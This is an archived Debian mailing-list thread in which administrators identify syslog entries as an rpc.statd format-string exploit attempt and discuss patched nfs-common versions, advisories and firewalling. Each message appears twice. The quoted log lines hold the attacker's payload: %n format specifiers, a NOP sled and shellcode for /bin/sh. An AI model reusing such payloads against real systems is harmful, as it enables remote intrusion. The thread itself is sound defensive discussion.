Re: syslog messages
I have checked this and i am running the recommended version nfs-common_0.1.9.1-1, also i don't see any obvious signs of access. Dose this mean i don't need to worry about it or is there something else i should be doing ? There is a bug in nfs-common_0.1.9.1 in Potato ( #111990 Hi, http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=111990archive=yesrepeatmerged=yes ) This bug is NOT related to your problem (nor any security problem, except putting garbage in logcheck mails), but you may be interested. dists/potato/main/binary-sparc/net/nfs-kernel-server_0.1.9.1-1.deb dists/potato/main/binary-sparc/net/nfs-common_0.1.9.1-1.deb dists/potato/main/binary-i386/net/nfs-kernel-server_0.1.9.1-1.deb dists/potato/main/binary-i386/net/nfs-common_0.1.9.1-1.deb pool/main/n/nfs-utils/nfs-common_0.1.9.1-1.potato1_i386.deb pool/main/n/nfs-utils/nfs-common_0.1.9.1-1.potato1_sparc.deb pool/main/n/nfs-utils/nfs-kernel-server_0.1.9.1-1.potato1_i386.deb pool/main/n/nfs-utils/nfs-kernel-server_0.1.9.1-1.potato1_sparc.deb You should use nfs-common_0.1.9.1-1.potato1 to avoid this problem. Can somebody explain me why the replacement 0.1.9.1-1 - 0.1.9.1-1.potato1 is not automatically done be apt ? My /etc/apt/source.list is: deb ftp://LOCAL_MIRROR/pub/debian stable main contrib non-free deb ftp://LOCAL_MIRROR/pub/debian-non-US stable/non-US main contrib non-free deb ftp://LOCAL_MIRROR/pub/debian-security stable/updates main contrib non-free (LOCAL_MIRROR is one of our boxes mirroring ftp.fr.debian.org and security.debian.org, just for our own needs). -- Benoît Sibaud RD Engineer - France Telecom
Re: syslog messages
Its an exploit attempt. See http://www.debian.org/security/2000/2719a and http://www.cert.org/advisories/CA-2000-17.html for more info On Thu, 21 Feb 2002, Marcel Welschbillig wrote: Hi, Im getting these strange entries in my syslog file. Can anyone shed some light on what this means ? Feb 21 14:03:35 jbeam Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7 FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2 11F3B0^KCD\200B0^ACD\200E8\177FF Thanks in advance ! Marcel -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Todays root password is brought to you by /dev/random .-. | Steve Mickeler * Network Operations | +-+ | Neptune Internet Services | `-' 1024D/ACB58D4F = 0227 164B D680 9E13 9168 AE28 843F 57D7 ACB5 8D4F -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: syslog messages
Just an attempt at a very old syslog exploit that has since been fix'd... Jeremy On Thu, Feb 21, 2002 at 09:02:13AM +0800, Marcel Welschbillig wrote: Hi, Im getting these strange entries in my syslog file. Can anyone shed some light on what this means ? Feb 21 14:03:35 jbeam Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7 FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2 11F3B0^KCD\200B0^ACD\200E8\177FF Thanks in advance ! Marcel -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: syslog messages
Marcel Welschbillig wrote: Hi, Im getting these strange entries in my syslog file. Can anyone shed some light on what this means ? Feb 21 14:03:35 jbeam Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7 FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 blah blah blah Thanks in advance ! Marcel Something along the lines of an old statd exploit. I believe this DSA[1] is the one that covers it, and also this CERT Advisory [2]. I would personally believe that the attack was unsuccessful, since it did write it to the log (rather than crash and give the attacker a shell), but the CERT advisory leads me to think otherwise. Check your version of nfs, 0.1.9.1-1 or better should be fixed. [1] http://www.debian.org/security/2000/2719a [2] http://www.cert.org/advisories/CA-2000-17.html Hope I have helped. - Will Wesley, CCNA Furious activity is no substitute for understanding. -- H.H. Williams -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: syslog messages
I have checked this and i am running the recommended version nfs-common_0.1.9.1-1, also i don't see any obvious signs of access. Dose this mean i don't need to worry about it or is there something else i should be doing ? Marcel Steve Mickeler wrote: Its an exploit attempt. See http://www.debian.org/security/2000/2719a and http://www.cert.org/advisories/CA-2000-17.html for more info On Thu, 21 Feb 2002, Marcel Welschbillig wrote: Hi, Im getting these strange entries in my syslog file. Can anyone shed some light on what this means ? Feb 21 14:03:35 jbeam Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7 FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2 11F3B0^KCD\200B0^ACD\200E8\177FF Thanks in advance ! Marcel -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Todays root password is brought to you by /dev/random ..-. | Steve Mickeler * Network Operations | +-+ | Neptune Internet Services | `-' 1024D/ACB58D4F = 0227 164B D680 9E13 9168 AE28 843F 57D7 ACB5 8D4F -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: syslog messages
-BEGIN PGP SIGNED MESSAGE- On Thu, 21 Feb 2002, Marcel Welschbillig wrote: I have checked this and i am running the recommended version nfs-common_0.1.9.1-1, also i don't see any obvious signs of access. Dose this mean i don't need to worry about it or is there something else i should be doing ? You should only allow necessary connections in your firewalling setup and deny everything else. Alex - -- Life is what happens to you while you're busy making other plans. John Lennon -BEGIN PGP SIGNATURE- Version: 2.6.3ia Charset: noconv iQCVAwUBPHRyQWWTYnZjEXP1AQHahgP7B7l3t1MGLW/o4NgUBKw7iBeS4hDeGujq 2ZnHPdahemSikFC4uZfqOv9CQGd/1aEzF+8X1GrTeAywUXmZej31WoBq6uAeGp/Y /ogBZLasznDoc1/i4lo5PQpx1tZDVwssJzJ2DNFzQO8JhfmfHqIFliN5B4+QDzhk 2IGNMdjFIKQ= =SNHP -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: syslog messages
I have checked this and i am running the recommended version nfs-common_0.1.9.1-1, also i don't see any obvious signs of access. Dose this mean i don't need to worry about it or is there something else i should be doing ? There is a bug in nfs-common_0.1.9.1 in Potato ( #111990 Hi, http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=111990archive=yesrepeatmerged=yes ) This bug is NOT related to your problem (nor any security problem, except putting garbage in logcheck mails), but you may be interested. dists/potato/main/binary-sparc/net/nfs-kernel-server_0.1.9.1-1.deb dists/potato/main/binary-sparc/net/nfs-common_0.1.9.1-1.deb dists/potato/main/binary-i386/net/nfs-kernel-server_0.1.9.1-1.deb dists/potato/main/binary-i386/net/nfs-common_0.1.9.1-1.deb pool/main/n/nfs-utils/nfs-common_0.1.9.1-1.potato1_i386.deb pool/main/n/nfs-utils/nfs-common_0.1.9.1-1.potato1_sparc.deb pool/main/n/nfs-utils/nfs-kernel-server_0.1.9.1-1.potato1_i386.deb pool/main/n/nfs-utils/nfs-kernel-server_0.1.9.1-1.potato1_sparc.deb You should use nfs-common_0.1.9.1-1.potato1 to avoid this problem. Can somebody explain me why the replacement 0.1.9.1-1 - 0.1.9.1-1.potato1 is not automatically done be apt ? My /etc/apt/source.list is: deb ftp://LOCAL_MIRROR/pub/debian stable main contrib non-free deb ftp://LOCAL_MIRROR/pub/debian-non-US stable/non-US main contrib non-free deb ftp://LOCAL_MIRROR/pub/debian-security stable/updates main contrib non-free (LOCAL_MIRROR is one of our boxes mirroring ftp.fr.debian.org and security.debian.org, just for our own needs). -- Benoît Sibaud RD Engineer - France Telecom -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: syslog messages
Its an exploit attempt. See http://www.debian.org/security/2000/2719a and http://www.cert.org/advisories/CA-2000-17.html for more info On Thu, 21 Feb 2002, Marcel Welschbillig wrote: Hi, Im getting these strange entries in my syslog file. Can anyone shed some light on what this means ? Feb 21 14:03:35 jbeam Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7 FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2 11F3B0^KCD\200B0^ACD\200E8\177FF Thanks in advance ! Marcel -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Todays root password is brought to you by /dev/random .-. | Steve Mickeler * Network Operations | +-+ | Neptune Internet Services | `-' 1024D/ACB58D4F = 0227 164B D680 9E13 9168 AE28 843F 57D7 ACB5 8D4F
Re: syslog messages
Just an attempt at a very old syslog exploit that has since been fix'd... Jeremy On Thu, Feb 21, 2002 at 09:02:13AM +0800, Marcel Welschbillig wrote: Hi, Im getting these strange entries in my syslog file. Can anyone shed some light on what this means ? Feb 21 14:03:35 jbeam Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7 FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2 11F3B0^KCD\200B0^ACD\200E8\177FF Thanks in advance ! Marcel -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: syslog messages
Marcel Welschbillig wrote: Hi, Im getting these strange entries in my syslog file. Can anyone shed some light on what this means ? Feb 21 14:03:35 jbeam Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7 FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 blah blah blah Thanks in advance ! Marcel Something along the lines of an old statd exploit. I believe this DSA[1] is the one that covers it, and also this CERT Advisory [2]. I would personally believe that the attack was unsuccessful, since it did write it to the log (rather than crash and give the attacker a shell), but the CERT advisory leads me to think otherwise. Check your version of nfs, 0.1.9.1-1 or better should be fixed. [1] http://www.debian.org/security/2000/2719a [2] http://www.cert.org/advisories/CA-2000-17.html Hope I have helped. - Will Wesley, CCNA Furious activity is no substitute for understanding. -- H.H. Williams
Re: syslog messages
I have checked this and i am running the recommended version nfs-common_0.1.9.1-1, also i don't see any obvious signs of access. Dose this mean i don't need to worry about it or is there something else i should be doing ? Marcel Steve Mickeler wrote: Its an exploit attempt. See http://www.debian.org/security/2000/2719a and http://www.cert.org/advisories/CA-2000-17.html for more info On Thu, 21 Feb 2002, Marcel Welschbillig wrote: Hi, Im getting these strange entries in my syslog file. Can anyone shed some light on what this means ? Feb 21 14:03:35 jbeam Feb 21 14:03:35 jbeam syslogd: Cannot glue message parts together Feb 21 14:03:35 jbeam /sbin/rpc.statd[198]: gethostbyname error for ^XF7FF BF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7FFBF^[F7 FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 Feb 21 14:03:35 jbeam C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\2 11F3B0^KCD\200B0^ACD\200E8\177FF Thanks in advance ! Marcel -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Todays root password is brought to you by /dev/random ..-. | Steve Mickeler * Network Operations | +-+ | Neptune Internet Services | `-' 1024D/ACB58D4F = 0227 164B D680 9E13 9168 AE28 843F 57D7 ACB5 8D4F
Re: syslog messages
-BEGIN PGP SIGNED MESSAGE- On Thu, 21 Feb 2002, Marcel Welschbillig wrote: I have checked this and i am running the recommended version nfs-common_0.1.9.1-1, also i don't see any obvious signs of access. Dose this mean i don't need to worry about it or is there something else i should be doing ? You should only allow necessary connections in your firewalling setup and deny everything else. Alex - -- Life is what happens to you while you're busy making other plans. John Lennon -BEGIN PGP SIGNATURE- Version: 2.6.3ia Charset: noconv iQCVAwUBPHRyQWWTYnZjEXP1AQHahgP7B7l3t1MGLW/o4NgUBKw7iBeS4hDeGujq 2ZnHPdahemSikFC4uZfqOv9CQGd/1aEzF+8X1GrTeAywUXmZej31WoBq6uAeGp/Y /ogBZLasznDoc1/i4lo5PQpx1tZDVwssJzJ2DNFzQO8JhfmfHqIFliN5B4+QDzhk 2IGNMdjFIKQ= =SNHP -END PGP SIGNATURE-